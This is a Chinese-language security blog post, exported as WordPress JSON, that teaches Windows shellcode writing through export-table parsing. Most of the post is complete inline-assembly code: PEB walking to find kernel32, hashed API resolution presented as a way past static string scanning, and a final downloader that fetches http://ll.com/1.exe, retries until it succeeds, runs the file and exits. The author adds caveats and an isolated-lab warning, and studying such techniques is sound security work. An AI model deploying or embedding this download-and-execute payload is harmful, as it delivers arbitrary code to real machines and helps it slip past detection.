{"id":160,"date":"2020-01-08T01:40:33","date_gmt":"2020-01-07T17:40:33","guid":{"rendered":"http:\/\/blog.73007300.xyz\/?p=160"},"modified":"2020-01-14T18:06:19","modified_gmt":"2020-01-14T10:06:19","slug":"%e7%90%86%e8%a7%a3pe%e6%a0%bc%e5%bc%8f-%e6%89%be%e5%87%ba%e5%af%bc%e5%87%ba%e8%a1%a8export-table%e4%b8%ad%e7%9a%84%e5%87%bd%e6%95%b0%e5%9c%b0%e5%9d%80shellcode%e7%af%87","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=160","title":{"rendered":"\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(ShellCode\u7bc7)"},"content":{"rendered":"\n<p>\u672c\u6587\u63a5\u4e0a\u4e00\u7bc7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-han-0-x-7300-039-s-blog\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"G141pRQ9lD\"><a href=\"https:\/\/blog.73007300.xyz\/?p=126\">\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(\u7406\u8bba\u7bc7)<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(\u7406\u8bba\u7bc7)&#8221; &#8212; han0x7300&#039;s blog\" src=\"https:\/\/blog.73007300.xyz\/?p=126&#038;embed=true#?secret=K1xoucshHW#?secret=G141pRQ9lD\" data-secret=\"G141pRQ9lD\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p> \u770b\u5b8c\u7406\u8bba\uff0c\u63a5\u7740\u8981\u6765\u5199\u4ee3\u7801\u5b9e\u8df5\u4e00\u4e0b\u3002<br> \u8981\u5b9e\u73b0\u7684\u529f\u80fd\u662f\u901a\u8fc7Inline Assembly \u6253\u5f00 C:\\1.exe <br> 
\u5148\u8981\u83b7\u53d6kernel32.dll\u5728\u5185\u5b58\u4e2d\u7684\u57fa\u5740\uff0c\u56e0\u4e3akernel32\u4e2d\u6709\u6211\u9700\u8981\u7684\u51fd\u6570\uff0c\u6709\u4e24\u79cd\u65b9\u6cd5\u3002 <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"279\" src=\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/01\/image-29.png\" alt=\"\" class=\"wp-image-162\"\/><figcaption><a href=\"https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\">https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html<\/a><\/figcaption><\/figure>\n\n\n\n<p> \u7b2c\u4e00\u79cd\u65b9\u6cd5\uff08https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\uff09\uff1a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\txor esi, esi\t\t\t; esi = 0\n    \tmov ebx, [fs:0x30 + esi]  \t; written this way to avoid null bytes\n\tmov ebx, [ebx + 0x0C] \n\tmov ebx, [ebx + 0x14] \n\tmov ebx, [ebx]\t\n\tmov ebx, [ebx]\t\n\tmov ebx, [ebx + 0x10]\t\t; ebx holds kernel32.dll base address 76830000\n\tmov [ebp-8], ebx \t\t; var8 = kernel32.dll base address<\/code><\/pre>\n\n\n\n<p> \u7b2c\u4e8c\u79cd\u65b9\u6cd5\uff08\u52a0\u5bc6\u89e3\u5bc6\u91cc\u7684\u65b9\u6cd5\uff09\uff1a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\txor\t\tecx, ecx\n\tmov\t\tecx, dword ptr fs:[0x30]\n\tmov\t\tecx, dword ptr [ecx+0x0C]\n\tmov\t\tesi, dword ptr [ecx+0x1C]\nsc_goonKernel:  \n\tmov\t\teax, dword ptr [esi+8] \n\tmov\t\tebx, dword ptr [esi+0x20]            \n\tmov\t\tesi, dword ptr [esi]\n\tcmp\t\tdword ptr [ebx+0x0C], 0x320033 ;\u5224\u65ad\u540d\u79f0\u4e2d\u5b57\u7b2632\u7684unicode\n\tjnz\t\tsc_goonKernel\n\tmov\t\tebx, eax  ;\u83b7\u53d6kernel32\u5730\u5740<\/code><\/pre>\n\n\n\n<p> \u672c\u6587\u91c7\u7528\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002需要注意两种方法的差别：第一种方法不比较模块名，而是假定 kernel32.dll 固定是 InMemoryOrderModuleList 里的第三个模块（两次 mov ebx, [ebx]，即 exe → ntdll → kernel32），这个顺序依赖于系统版本和加载器实现，一旦顺序不同，ebx 拿到的就是别的模块的基址，后面的导出表解析会得到错误地址甚至崩溃；第二种方法遍历链表并按名称匹配，相对更稳健，但它也只比较了 BaseDllName 偏移 0x0C 处的两个 UTF-16 字符“32”，并不是完整的名称比较。另外两种方法都依赖 fs:[0x30] 和 32 位结构偏移，只适用于 32 位进程。<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"> 
\u57fa\u7840\u7248ShellCode: <\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n#include &lt;windows.h>\n#include &lt;string>\n#include &lt;iostream>\n\n\/*\n ref: https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html \n*\/\nint main(int argc, char* argv[])\n{\n    std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    DWORD kernel32Adrress,scStart,scEnd,WinExecAddress;\n    int numberOfFunction ;\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n    \"start: \\n\\t\"       \n\n        \"push ebp \\n\\t\"\n        \"mov ebp, esp \\n\\t\"\n\n        \"sub    ebp,0x18 \\n\\t\" \/\/ Allocate memory on stack for local variables\n\n        \"push   0x00636578 \\n\\t\" \/\/ \u628a\"C:\\1.exe\"\u4f5c\u4e3a\u53d8\u91cf\u63a8\u5230\u6808\u91cc\uff0c 1.exe\u662f\u8981\u6253\u5f00\u7684\u7a0b\u5e8f\n        \"push   0x456e6957 \\n\\t\"    \/\/  0x00 \u4f5c\u4e3a\u53d8\u91cf\u7684\u7ed3\u675f\u7b26\n        \"mov    [ebp-4], esp \\n\\t\"  \/\/ var4 = \"WinExec\\x00\"\n\n        \"xor esi, esi \\n\\t\"\n        \"mov ebx, [fs:0x30 + esi] \\n\\t\"\n        \"mov ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov ebx, [ebx + 0x14] \\n\\t\"\n        \"mov ebx, [ebx] \\n\\t\"\n        \"mov ebx, [ebx] \\n\\t\"\n        \"mov ebx, [ebx + 0x10] \\n\\t\"\n\n        \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n        \n        \"mov ecx, [eax + 0x24] \\n\\t\" \/\/ RVA of Ordinal Table\n        \"add ecx, ebx \\n\\t\" \/\/ Address of Ordinal Table\n        \"mov [ebp-0x0C], ecx \\n\\t\" \/\/ var_0C = Address of Ordinal Table\n\n        \"mov edi, [eax + 0x20] \\n\\t\"    \/\/ RVA of Name Pointer Table\n        \"add edi, ebx \\n\\t\"     \/\/ Address of Name Pointer Table\n        \"mov 
[ebp-0x10], edi \\n\\t\"   \/\/ var_10 = Address of Name Pointer Table\n\n        \"mov edx, [eax + 0x1C] \\n\\t\"    \/\/ RVA of Address Table\n        \"add edx, ebx \\n\\t\"     \/\/ Address of Address Table\n        \"mov [ebp-0x14], edx \\n\\t\" \/\/    var_14 = Address of Address Table\n        \n        \"mov edx, [eax + 0x14] \\n\\t\"    \/\/ Number of exported functions\n\n        \"xor    eax,eax \\n\\t\"   \/\/ function name address index\n\n    \"loop: \\n\\t\"\n        \"mov    edi, [ebp-0x10] \\n\\t\"   \/\/ var_10 = Address of Name Pointer Table\n        \"mov    esi, [ebp-4] \\n\\t\"  \/\/ var4 = \"WinExec\\x00\"\n        \"xor    ecx, ecx \\n\\t\"  \/\/ function name char index\n\n        \"cld \\n\\t\"  \/\/  Clear direction flag,set DF=0 => process strings from left to right.    \n        \"mov    edi,[edi + eax*4] \\n\\t\"  \/\/ next function name RVA \n \n        \"add    edi, ebx \\n\\t\"\n        \"add    cx,8 \\n\\t\"\n        \"repe   cmpsb \\n\\t\" \/\/ Compare the first 8 bytes of strings in \n                        \/\/ esi and edi registers. 
ZF=1 if equal, ZF=0 if not\n        \"jz found \\n\\t\"\n        \"inc    eax \\n\\t\"\n        \"cmp    eax,edx \\n\\t\"   \/\/check if last function is reached\n        \"jb     loop  \\n\\t\"   \/\/ if not the last -> loop\n        \"add    esp,0x26 \\n\\t\"\n        \"jmp    end \\n\\t\"\n\n    \"found: \\n\\t\"\n        \"mov    ecx, [ebp-0x0C] \\n\\t\" \/\/ var_0C = Address of Ordinal Table\n        \"mov    edx, [ebp-0x14]\\n\\t\"  \/\/ var_14 = Address of Address Table\n\n        \"mov    ax, [ecx + eax*2] \\n\\t\" \/\/ ax = ordinal number = var_0C + (counter * 2)\n        \"mov    eax, [edx + eax*4] \\n\\t\"    \/\/  eax = RVA of function = var_14 + (ordinal * 4)\n        \"mov    %0, eax \\n\\t\"\n        \"add    eax,ebx \\n\\t\"  \/\/  eax = address of WinExec  = kernel32.dll base address + RVA of WinExec\n        \n\n        \"xor    edx,edx \\n\\t\"\n        \"push   edx \\n\\t\"   \/\/ null termination\n        \"push   0x6578652e \\n\\t\"\n        \"push   0x315c3a43 \\n\\t\"\n        \"mov    esi,esp \\n\\t\"\n\n        \"push   10 \\n\\t\"\n        \"push   esi \\n\\t\"\n        \"call   eax \\n\\t\"\n        \n        \"add    esp, 0x46 \\n\\t\"\n        \n    \"end: \\n\\t\"\n\n        :\"=r\" (WinExecAddress)\n        :\"r\" (WinExecAddress)\n        :    \n    );\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%llx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n\n}\n<\/code><\/pre>\n\n\n\n<p> \u7a0b\u5e8f\u5c31\u662f\u627e\u5230kernel32.dll \u7136\u540e\u627e\u5230\u5bfc\u51fa\u8868\uff0c\u904d\u5386\u627e\u5230Function name Table \u4e2dWinExec\u7684\u4f4d\u7f6e\uff0c<br> \u901a\u8fc7\u8fd9\u4e2a\u4f4d\u7f6e\u627e\u5230Ordinal Table\u4e2d\u6307\u5b9a\u7684index\uff0c\u901a\u8fc7\u8fd9\u4e2aindex\u5728 Address Table\u627e\u5230 WinExec\u7684\u5730\u5740\uff0c\u7136\u540e\u4f20\u53c2\uff0ccall\u8fd9\u4e2a\u5730\u5740\u3002 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\"> <br> \u8fdb\u9636\u7248ShellCode: <\/h2>\n\n\n\n<pre 
class=\"wp-block-code\"><code>#include &lt;stdio.h>\n#include &lt;windows.h>\n#include &lt;string>\n#include &lt;iostream>\n\nint main(int argc, char* argv[])\n{\n    std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    DWORD WinExecAddress=0;\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n    \"start:\\n\\t\"      \n        \"xor    ecx, ecx\\n\\t\" \n        \"mov    ebx, fs:[0x30] \\n\\t\"\n        \"mov    ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov    ebx, [ebx + 0x14] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx + 0x10] \\n\\t\"\n\n        \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n\n        \"push   eax \\n\\t\" \/\/ save \n\n        \"xor    ecx, ecx \\n\\t\"  \/\/ ecx: record how far from first function name\n        \"dec    ecx \\n\\t\" \n        \"mov    esi, [eax + 0x20] \\n\\t\"   \/\/ RVA of Name Pointer Table\n        \"add    esi, ebx \\n\\t\"            \n        \n    \"Find_Loop: \\n\\t\"\n        \n        \"inc    ecx \\n\\t\"   \n        \"lods   dword ptr [esi] \\n\\t\"   \/\/ traverse function name\n        \"add    eax,ebx \\n\\t\"   \/\/ + base address. 
to get function name Address\n        \"xor    edi, edi \\n\\t\"  \/\/ edi: hashed value\n    \"Hash_Loop: \\n\\t\"\n        \"movsx  edx, byte ptr [eax] \\n\\t\"\n        \"cmp    dl,dh \\n\\t\" \/\/ \/\/ \u51fd\u6570\u540d\u4ee5 00 \u7ed3\u675f\uff0c\u82e5\u53d6\u5230 00 \uff0c\u5219\u8bfb\u5b8c\u4e86\u8fd9\u4e2a\u51fd\u6570\u540d\n        \"je     hash_OK \\n\\t\" \/\/ \u8fd9\u4e2a\u51fd\u6570\u540d\u5df2\u7ecf\u8bfb\u53d6\u5230\u6700\u540e\u4e00\u4f4d\n        \"ror    edi, 7 \\n\\t\"\n        \"add    edi,edx \\n\\t\"   \/\/ \/\/ hash\u8fc7\u7684\u503c \u5b58\u5728 edi\n        \"inc    eax \\n\\t\"\n        \n        \"jmp    Hash_Loop \\n\\t\"\n        \n    \"hash_OK: \\n\\t\"\n        \"cmp    edi, 0x01a22f51 \\n\\t\" \/\/ cmp edi , [ebp-4]\n        \"jnz    Find_Loop \\n\\t\"\n        \"pop    esi \\n\\t\"\n        \"mov    edi, dword ptr [esi+0x24] \\n\\t\"\n        \"add    edi, ebx \\n\\t\"\n        \"mov    cx,word ptr [edi+ecx*2] \\n\\t\" \/\/ Ordinal Table\n        \"mov    edi, dword ptr [esi+0x1c]\\n\\t\" \/\/  RVA of Address Table\n        \"add    edi, ebx \\n\\t\"\n        \"mov    eax, dword ptr [edi+ecx*4] \\n\\t\" \/\/ RVA of function address\n        \"add    eax, ebx \\n\\t\"\n        \"mov    %0, eax \\n\\t\"\n        \n        \"xor    edx,edx \\n\\t\"\n        \"push   edx \\n\\t\"   \/\/ null termination\n        \"push   0x6578652e \\n\\t\"\n        \"push   0x315c3a43 \\n\\t\"\n        \"mov    esi,esp \\n\\t\"\n\n        \"push   10 \\n\\t\"\n        \"push   esi \\n\\t\"\n        \"call   eax \\n\\t\"\n        \n        \"add    esp, 0x46 \\n\\t\"\n        \n    \"end: \\n\\t\"\n\n        : \"=r\" (WinExecAddress)\n        : \"r\" (WinExecAddress)\n        :    \n    );\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%lx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n}\n<\/code><\/pre>\n\n\n\n<p> \u8fdb\u9636\u7248ShellCode\u7528\u4e86\u52a0\u5bc6\u89e3\u5bc6\u4e2d\u7684Hash\u7b97\u6cd5\u627eFunction 
Name\uff0c目的是让 API 名称字符串不以明文出现在二进制里，从而绕过基于字符串的静态扫描。需要说明的是，这并不等于“防止被检测到”：遍历 PEB 找 kernel32、手工解析导出表、ror 7 加法散列这些模式本身就是杀软和 EDR 常见的 shellcode 特征，而解析 kernel32 导出表并调用 WinExec 的行为在动态分析和沙箱下依然可见。API 散列只是提高了静态分析的门槛，不是免检。 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7ec8\u6781\u7248\uff08\u52a0\u5bc6\u89e3\u5bc6\u7248\uff09<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n\/\/#include &lt;windows.h>\n\/\/#include &lt;string>\n\/\/#include &lt;iostream>\n\nint main(int argc, char* argv[])\n{\n    \/\/std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    \/\/DWORD WinExecAddress=0;\n\n    \/\/ 1. \u627e\u5230Kernel32\u7684\u57fa\u5740\n    \/\/ 2. \u627e\u5230Kernel32.LoadLibrary\n    \/\/ 3. \u52a0\u8f7durlmon.dll\n    \/\/ 4. \u627e\u5230urlmon\u7684API\n    \/\/ 5. \u8c03\u7528\u51fd\u6570\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n        \n        \/\/ hash value\n        \"push   0x00657865 \\n\\t\"\n        \"push   0x2e312f6d \\n\\t\"\n        \"push   0x6f632e6c \\n\\t\"\n        \"push   0x6c2f2f3a \\n\\t\"\n        \"push   0x70747468 \\n\\t\"    \/\/ http:\/\/ll.com\/1.exe  \/\/ map hosts: C:\\Windows\\System32\\drivers\\etc\\hosts\n        \"push   0x00000000 \\n\\t\"    \/\/ Address of Download file path\n        \"push   0x9aafd680 \\n\\t\" \/\/ Urlmon.URLDownloadToFileA\n        \"push   0x6118f28f \\n\\t\" \/\/ Kernel32.TerminateProcess\n        \"push   0xcb9765a0 \\n\\t\" \/\/ Kernel32.Sleep\n        \"push   0x01a22f51 \\n\\t\" \/\/ Kernel32.WinExec\n        \"push   0x837de239 \\n\\t\" \/\/ Kernel32.GetTempPathA\n        \"push   0x6144aa05 \\n\\t\" \/\/ Kernel32.VirtualFree\n        \"push   0x1ede5967 \\n\\t\" \/\/ Kernel32.VirtualAlloc\n\n        \"mov    ebp, esp \\n\\t\"\n\n        \/\/  1. 
\u627e\u5230Kernel32\u7684\u57fa\u5740\n    \"BaseAddress:\\n\\t\"      \n        \"xor    ecx, ecx\\n\\t\" \n        \"mov    ebx, fs:[0x30] \\n\\t\"\n        \"mov    ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov    ebx, [ebx + 0x14] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx + 0x10] \\n\\t\" \/\/ ebx: Base Address of Kernel32.dll\n        \"mov    ebp, esp \\n\\t\"\n        \/\/\"int 3\\n\\t\"\n        \n        \/\/ 2. \u627e\u5230Kernel32.LoadLibrary\n        \/*\n        \/\/ \u53c2\u6570\uff1aebx\uff0c .dll Base Address\n        \/\/ \u53c2\u6570\uff1aedi, API\u7684Hash\u503c\n        \/\/ \u53c2\u6570\uff1aecx, dll\u4e2d\u8981\u627e\u7684API\u6570\u91cf\n                \n        \u7528ecx \u548c loop\u6765\u63a7\u5236\u67e5\u627e\u7684\u6b21\u6570\n        Kernel32\u4e2d\u9700\u8981\u7528\u52307\u4e2aAPI\uff0c\u6240\u4ee5\u8fd9\u91ccecx\u8d4b\u503c7\n        *\/  \n        \"mov    ebp, esp \\n\\t\" \n        \"mov    ecx, 0x07 \\n\\t\"  \n        \"mov    edi, ebp \\n\\t\"\n\n    \"FindApi_loop: \\n\\t\"\n        \/\/ Find Kernel32API\n        \"call   FindApi \\n\\t\"\n        \"loop   FindApi_loop \\n\\t\"\n        \/\/ LoadLibraryA load urlmon.dll\n        \/\/ now edi is point to last hashed value\n        \"push   0x6e6f \\n\\t\"\n        \"push   0x6d6c7275 \\n\\t\"\n        \"mov    eax,esp \\n\\t\"\n        \"push   eax \\n\\t\"\n        \"call   dword ptr[ebp] \\n\\t\"\n        \"mov    ebx, eax \\n\\t\" \/\/ ebx is image base address of urlmon.dll\n        \"pop    eax \\n\\t\"\n        \"pop    eax \\n\\t\"\n\n        \"call   FindApi \\n\\t\"\n\n        \"nop \\n\\t\"\n        \"nop \\n\\t\"\n        \"nop \\n\\t\"\n\n        \"jmp    start_use_function \\n\\t\"\n        \"nop \\n\\t\"\n\n    \"FindApi: \\n\\t\"\n        \"push   ecx \\n\\t\" \/\/ ecx\u7b49\u4e0b\u8981\u88ab\u7528\u4f5c\u904d\u5386function name\n        \"push   ebp \\n\\t\"\n\n        \/\/\"int 3\\n\\t\"\n      
  \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n\n        \"push   eax \\n\\t\" \/\/ save \n\n        \"xor    ecx, ecx \\n\\t\"  \/\/ ecx: record how far from first function name\n        \"dec    ecx \\n\\t\" \n        \"mov    esi, [eax + 0x20] \\n\\t\"   \/\/ RVA of Name Pointer Table\n        \"add    esi, ebx \\n\\t\"            \n        \n    \"Find_Loop: \\n\\t\"\n        \n        \"inc    ecx \\n\\t\"   \n        \"lods   dword ptr [esi] \\n\\t\"   \/\/ traverse function name\n        \"add    eax,ebx \\n\\t\"   \/\/ + base address. to get function name Address\n        \"xor    ebp, ebp \\n\\t\"  \/\/ ebp: hashed value\n    \"Hash_Loop: \\n\\t\"\n        \"movsx  edx, byte ptr [eax] \\n\\t\"\n        \"cmp    dl,dh \\n\\t\" \/\/ \/\/ \u51fd\u6570\u540d\u4ee5 00 \u7ed3\u675f\uff0c\u82e5\u53d6\u5230 00 \uff0c\u5219\u8bfb\u5b8c\u4e86\u8fd9\u4e2a\u51fd\u6570\u540d\n        \"je     hash_OK \\n\\t\" \/\/ \u8fd9\u4e2a\u51fd\u6570\u540d\u5df2\u7ecf\u8bfb\u53d6\u5230\u6700\u540e\u4e00\u4f4d\n        \"ror    ebp, 7 \\n\\t\"\n        \"add    ebp,edx \\n\\t\"   \/\/ \/\/ hash\u8fc7\u7684\u503c \u5b58\u5728 ebp\n        \"inc    eax \\n\\t\"\n        \n        \"jmp    Hash_Loop \\n\\t\"\n        \n    \"hash_OK: \\n\\t\"\n        \n        \"cmp    ebp, dword ptr [edi] \\n\\t\" \n        \"jnz    Find_Loop \\n\\t\"\n        \"pop    esi \\n\\t\"\n        \"mov    ebp, dword ptr [esi+0x24] \\n\\t\"\n        \"add    ebp, ebx \\n\\t\"\n        \/\/\"int 3\\n\\t\"\n        \"mov    cx,word ptr [ebp+ecx*2] \\n\\t\" \/\/ Ordinal Table\n        \"mov    ebp, dword ptr [esi+0x1c]\\n\\t\" \/\/  RVA of Address Table\n        \"add    ebp, ebx \\n\\t\"\n        \"mov    eax, dword ptr [ebp+ecx*4] \\n\\t\" \/\/ RVA of function 
address\n        \"add    eax, ebx \\n\\t\"\n        \"stos   dword ptr es:[edi] \\n\\t\" \/\/ put eax to edi pointed value,then edi increase 4 bytes . So ebp first 4 bytes saveed first function address\n        \"pop    ebp \\n\\t\"\n        \"pop    ecx \\n\\t\"      \n        \"ret\\n\\t\"\n        \n    \"start_use_function: \\n\\t\"\n        \/* from now , you can invoke that 8 function through \"dword ptr [ebp]\"\n\n            dword ptr[ebp+0x0] :   Kernel32.LoadLibraryA\n            dword ptr[ebp+0x4] :   Kernel32.VirtualAlloc\n            dword ptr[ebp+0x8] :   Kernel32.VirtualFree\n            dword ptr[ebp+0xc] :   Kernel32.GetTempPathA\n            dword ptr[ebp+0x10] :  Kernel32.WinExec\n            dword ptr[ebp+0x14] :  Kernel32.Sleep\n            dword ptr[ebp+0x18] :  Kernel32.TerminateProcess\n            dword ptr[ebp+0x1c] :  Urlmon.URLDownloadToFileA\n\n         *\/      \n        \/*\n             Open C:\\1.exe\n            \"push   0x00 \\n\\t\"   \/\/ null termination\n            \"push   0x6578652e \\n\\t\"\n            \"push   0x315c3a43 \\n\\t\"\n            \"mov    esi,esp \\n\\t\"\n\n            \"push   10 \\n\\t\"\n            \"push   esi \\n\\t\"\n            \"call   dword ptr [ebp+0x10] \\n\\t\"\n            \"pop    eax \\n\\t\"   \/\/ \u5e73\u8861\u6808\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n\n        *\/\n\n        \/*\n            Set Download path\n        *\/\n        \"push    0x40 \\n\\t\"\n        \"push    0x1000 \\n\\t\"\n        \"push    0x100 \\n\\t\"\n        \"push    0 \\n\\t\"\n        \"call    dword ptr [ebp+0x4] \\n\\t\"  \/\/  kernel32.VirtualAlloc\n        \"mov     dword ptr [ebp+0x20], eax \\n\\t\"\n        \/\/\u83b7\u53d6\u4e34\u65f6\u6587\u4ef6\u5939\u8def\u5f84\n        \"push   eax \\n\\t\"\n        \"push   0x100 \\n\\t\"\n        \"call   dword ptr [ebp+0x0c] \\n\\t\"  \/\/Kernel32.GetTempPathA\n    
    \/\/\u8bbe\u7f6e\u4e34\u65f6exe\u6587\u4ef6\u8def\u5f84\n        \/\/%TEMP%\\1.exe\n        \"mov    ecx, dword ptr[ebp+0x20] \\n\\t\"\n        \"add    ecx, eax \\n\\t\"\n        \"mov    dword ptr[ecx], 0x78652e31 \\n\\t\"\n        \"mov    dword ptr[ecx+0x4], 0x0065 \\n\\t\"\n        \"mov    dword ptr[ecx+0x8], 0 \\n\\t\"\n        \/*\n            download file\n        *\/\n    \"try_Download: \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   dword ptr[ebp+0x20] \\n\\t\"\n        \"lea    eax, dword ptr[ebp+0x24] \\n\\t\"\n        \"push   eax \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"call   dword ptr[ebp+0x1c] \\n\\t\"   \/\/urlmon.URLDowanloadToFileA\n        \"test   eax, eax \\n\\t\"\n        \"jz     Download_OK \\n\\t\"\n        \"push   30000 \\n\\t\"\n        \"call   dword ptr[ebp+0x14] \\n\\t\"   \/\/Kernel32.Sleep\n        \"jmp    try_Download \\n\\t\"\n        \n    \"Download_OK: \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   dword ptr[ebp+0x20] \\n\\t\"\n        \"call   dword ptr[ebp+0x10] \\n\\t\"    \/\/Kernel32.WinExec\n\n        \"push    0x08000 \\n\\t\"\n        \"push    0x00 \\n\\t\"\n        \"push    dword ptr [ebp+0x20] \\n\\t\"\n        \"call    dword ptr [ebp+0x08] \\n\\t\" \/\/kernel32.VirtualFree\n\n        \/\/\"mov    %0, eax \\n\\t\"   \/\/ test code\n\n        \"push   0 \\n\\t\"\n        \"push   0x0FFFFFFFF \\n\\t\"\n        \"call   dword ptr[ebp+0x18] \\n\\t\"\n\n        \/*\n        : \"=r\" (WinExecAddress)\n        : \"r\" (WinExecAddress)\n        :   \n        *\/ \n    );\n    \/\/ if 1.exe was success download and excute, this will not run:\n    \/*\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%lx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n    
*\/\n}\n<\/code><\/pre>\n\n\n\n<p>\u7a0b\u5e8f\u7684\u529f\u80fd\u662f\u4ecehttp:\/\/ll.com\/1.exe\u4e0b\u8f7d\u5e76\u6267\u884c\u3002ll.com\u53ef\u4ee5\u5728etc\\hosts\u91cc\u505a\u6620\u5c04\u3002这是一个典型的 downloader：URLDownloadToFileA 走的是明文 HTTP，对下载回来的文件没有任何完整性或签名校验；下载失败时 Sleep 30 秒后无限重试（try_Download 循环），成功后用 WinExec 直接执行，再调用 TerminateProcess 结束自身。请只在与外网隔离的实验虚拟机里运行，并自行搭建 ll.com 对应的测试服务器，不要把它指向任何真实主机。<\/p>\n\n\n\n<p>\u53ea\u662f\u6838\u5fc3\u4ee3\u7801\u7684\u601d\u8def\u548c\u52a0\u5bc6\u89e3\u5bc6\u4e00\u6837\uff0c\u533a\u522b\u662f\u6211\u628a\u6570\u636e\u76f4\u63a5\u5728\u6c47\u7f16\u4ee3\u7801\u91ccpush\u4e86\u3002<br> \u5148\u83b7\u53d67\u4e2aKernel32\u7684\u51fd\u6570\u5730\u5740\uff0c\u518d\u83b7\u53d6Urlmon\u7684\u51fd\u6570\u5730\u5740\uff0c\u653e\u5230\u6808\u91cc\uff0c\u6700\u540e\u901a\u8fc7ebp\u8c03\u7528\u6240\u9700\u8981\u7684\u51fd\u6570\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>  \u7f16\u8bd1\uff08MinGW，需使用 32 位 i686 工具链）：代码依赖 fs:[0x30] 取 PEB、32 位寄存器和 32 位结构偏移，只能作为 32 位进程运行；64 位进程的 PEB 在 gs:[0x60]，LDR 和导出表相关偏移也不同，用 64 位 MinGW 编译会报错或运行出错。 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>g++.exe .\\shellcode.cpp -o shellcode -masm=intel  -static-libgcc -static-libstdc++<\/code><\/pre>\n\n\n\n<p> \u5173\u4e8e\u8fd9\u91cc\u7684Hash\u7b97\u6cd5\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-han-0-x-7300-039-s-blog\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"c48HZj70Dl\"><a href=\"https:\/\/blog.73007300.xyz\/?p=114\">Hash Function Name In Shellcode<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Hash Function Name In Shellcode&#8221; &#8212; han0x7300&#039;s blog\" 